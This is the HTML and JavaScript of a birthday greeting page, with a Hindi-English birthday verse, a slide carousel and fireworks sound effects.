<p style="text-shadow: 1px 1px 3px #FF0000, 1px 1px 3px #FF0000, -1px -1px 3px #FF0000, -1px -1px 3px #FF0000;color: yellow;">Hope your birthday is as wonderful and extraordinary as you are <br><br>
</p>
<p style="text-shadow: 1px 1px 3px white, 1px 1px 3px white, -1px -1px 3px white, -1px -1px 3px white; color: red;">
Life का हर Goal रहे आपका Clear,<br>
तुम Success पाओ Without any Fear<br>
हर पल जियो Without any Tear,<br>
Enjoy your day my Dear,<br>
🎂HAPPY BIRTHDAY🎂🎀🎁

</p>
<div class="pyro">
<div class="before"></div></div>
<br><br>
</div>
<br>
<script>
var myIndex = 0;
carousel();

function carousel() {
    var i;
    var x = document.getElementsByClassName("mySlides");
    for (i = 0; i < x.length; i++) {
       x[i].style.display = "none";  
    }
    myIndex++;
    if (myIndex > x.length) {myIndex = 1}    
    x[myIndex-1].style.display = "block";  
    setTimeout(carousel, 2000); // Change image every 2 seconds
}
</script>
<audio id="aud" src="fireworks.mp3" autostart="false"></audio>
<audio id="audiocracker" src="http://fundamentalofphysics.com/anshu.mp3" autostart="false"></audio>

<script>
    function playSound() {
          var sound = document.getElementById("audiocracker");
          sound.play()
      }
    function bjaSound() {
          var sound = document.getElementById("aud");
          sound.play()
     }
    function start(){
      playSound();
      bjaSound();
    }
    </script>
</body></html>